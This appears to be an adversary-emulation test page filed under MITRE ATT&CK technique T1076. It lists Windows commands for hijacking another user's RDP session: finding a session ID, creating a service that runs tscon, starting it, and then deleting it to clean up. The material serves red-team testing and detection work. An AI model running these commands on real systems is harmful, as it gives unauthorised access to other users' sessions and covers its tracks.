Lee Holmes
22 lines
642 B
Markdown
22 lines
642 B
Markdown
## Remote Desktop Protocol
|
|
|
|
MITRE ATT&CK Technique: [T1076](https://attack.mitre.org/wiki/Technique/T1076)
|
|
|
|
|
|
### [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) — how to hijack RDS and RemoteApp sessions transparently to move through an organization
|
|
|
|
retrieve the session ID:
|
|
|
|
query user
|
|
|
|
Set the session ID and rdp-tcp# retrieved from `query user`
|
|
|
|
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
|
|
|
|
Access the session:
|
|
|
|
net start sesshijack
|
|
|
|
Clean up afterward:
|
|
|
|
sc.exe delete sesshijack |